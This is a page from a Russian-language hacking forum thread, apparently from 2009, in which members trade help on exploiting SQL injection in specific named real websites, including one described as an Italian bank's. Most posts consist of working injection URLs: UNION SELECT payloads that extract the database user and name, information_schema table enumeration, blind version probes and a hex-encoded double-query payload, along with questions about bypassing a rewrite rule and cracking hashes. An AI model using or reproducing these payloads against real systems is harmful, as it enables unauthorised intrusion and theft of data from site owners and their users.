Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Не могу подобрать НИ количество столбцов и полей, как только я не крутил....не понимаю в чем проблема....
    вот ссыль: http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318 (MYSQL Injection)

    При любом раскладе пишет: The used SELECT statements have a different number of columns


    если кто нить подберет,расскажите пожалуйста.

    П.С. Сайт итальянского банка.
     
    #7461 jecka3000, 10 Jun 2009
    Last edited: 10 Jun 2009
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    jecka3000
    скорее всего это слепая скуля...

    http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318+AND+SUBSTRING((version()),1,1)=4

    Version: 4.1.16-standard
    Database:CRM
    User:windpress@media
     
  3. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    Как обойти?

    Вывод норм, как только тейбл нейм так и все
    Всего: 64


    Тож самое только когда вводишь юзера
    5.0.67-log
    u7749_2
     
  4. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    используй hex():
    http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,hex(user()),database(),0x0b)+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goal%5B3%5D%3D&goal%5B4%5D%3D&page=0
    http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,hex(TABLE_NAME),0x0b)+FROM+information_schema.TABLES+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goal%5B3%5D%3D&goal%5B4%5D%3D&page=0
     
    3 people like this.
  5. Flair

    Flair Member

    Joined:
    7 May 2009
    Messages:
    36
    Likes Received:
    13
    Reputations:
    9
    Заметил в хостинге такие ошибки
    а когда начал лить двиг то вылезло вот такое
    /home/freehost/www/freehostusers/) in /mnt/d2/freehostusers/flairh6/my/index.php
    flairh6/my- это мое, а остально ето хостинга
    непобоюсь минуса в профиле, но все таки спрошу, как это можно использовать? :)
     
    1 person likes this.
  6. AngelOfFaith

    AngelOfFaith Member

    Joined:
    2 Feb 2009
    Messages:
    6
    Likes Received:
    5
    Reputations:
    0
    В скрипте есть такой участок кода:
    $nomer = $_GET['nomer'];
    $art = mysql_query("SELECT article FROM chat_articles WHERE nomer=$nomer");
    $article = mysql_result($art,0);
    Понятно что здест скуля, только проблема в том как её заюзать из-за реврайта?
    Вот правило для модреврайт:
    RewriteRule ^art/([a-z0-9]*)/([a-z0-9]*)/?$ art.php?ver=$1&nomer=$2 [L,QSA]
    Возможно ли в этом случае произвести иньекцию и если да то каким образом?
     
  7. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Это просто не конектится(подключатся) МускуЛ...........
     
  8. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Попробуй обратиться к скрипту на прямую art.php?ver=1&nomer=-1[SQL] хотя скорее всего тебя пошлют с NOT FOUND или реврайт на индекс, а так единственая проблемма это пробелы потому как судя по SQL запросу коментить ничего не надо(хотя я больше чем уверен что пременная используеться где то еще в SQL запросе).
     
    1 person likes this.
  9. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    есть sql-inj
    http://www.yetinepal.com/modules/school/school.php?id=2+order+by+1
    количество столбцов - 1
    пробую union select
    http://www.yetinepal.com/modules/school/school.php?id=2+uNion+sElecT+1
    получаем 1222 - The used SELECT statements have a different number of columns
    как такие ситуации можно обойти?

    P.s. мускул пятый

    http://www.yetinepal.com/modules/school/school.php?id=2+and+substring(version(),1,1)=5
     
  10. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Например, раскрутить как блинд
     
  11. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    Всем привет внимание вопрос:
    попался сайт со скулей, но запрос вида ?id=1+union+select+1,2,3,4/*
    выдаёт, - "Ошибка - две страницы с одним идентификатором"
    что за хрень? впервые такое вижу(
    Если неправильное число полей, то
    The used SELECT statements have a different number of columns
    т.е. тут ок.
    Что с этим можно сделать?
     
  12. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Попробую id=-1[sql]
     
  13. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    Пробовал, в этом случае пропадает весь текст, остаётся только костяк сайта, вывода нет(
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Давай линк, иначе будет гадание на кофейной гуще на 10 страниц
     
    1 person likes this.
  15. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    _http://www.niat.ru/design/page_rus.php?id=1+union+select+1,2,3,4/*
    тока не дефейсить
     
  16. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Поле 2 и 3 отвечают за путь до изображения вверху страницы,в поле 3 проходят тока цифры и по всей видимости там либо JOIN либо сабселект или еще одна гверя так как патч до этого изображения по всей видимости береться из бд(потому как если указать от балды значения то путь до изображения идет пустой), а во втором поле идет какой то фильтр на выводимые данные потому как ничего кроме 0x2f(/) и 0x2e(.) в нем не проходят(возможно file_exists() и etc), вывод в 1-ом и 4-ом поле на страницу я не увидел, только блайнд по всей видимости, версия 5 http://www.niat.ru/design/page_rus.php?id=8+and+substring(version(),1,1)=5
     
    2 people like this.
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    PaCo куда торопишься? :)

    http://www.niat.ru/design/page_rus.php?id=11111+union+select+1,2,concat(0x3a3a3a3a,Version()),4/*

    Grey: Джок, тебе повезло, что тут вывод в сообщение об ошибке, но там двойной запрос и в идеале нужно так юзать:

    Code:
    http://www.niat.ru/design/page_rus.php?id=1+and+1=2+union+select+1,2,0x3120616e6420313d3220756e696f6e2073656c65637420636f6e63617428273e272c76657273696f6e2829292f2a,4/*
    Позвольте, что значит повезло? :) Я увидел там вывод, хотя искал двойной запрос. Есть вывод-нет заморочек

    Grey: так не честно :(
    А вообще ты так можешь паренька сильно загрузить и он может не понять, как так получилось с инъекцией, а это повлечет новые вопросы...
     
    #7477 Kakoytoxaker, 12 Jun 2009
    Last edited by a moderator: 12 Jun 2009
    3 people like this.
  18. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    пожалуй паренька больше загрузит непонятный хекс в 3-м поле))
    Кстати встречал как то подобную скулю
     
  19. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    привет всем, я понимаю что на мой вопрос полюбому есть ответ в этой теме, но что бы не листать 757 страниц задам его ещё раз.
    Как перевести таблицу в кеш?
    Раньше пользовался http://nahta4ok.far.ru/tools.php , но вчера он закрыл свой сайт.
    Может есть праги?
     
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а поиск поюзать?
    и что за кеш? попробуй http://x3k.ru/ если конечно я тебя правильно понял
     
Thread Status:
Not open for further replies.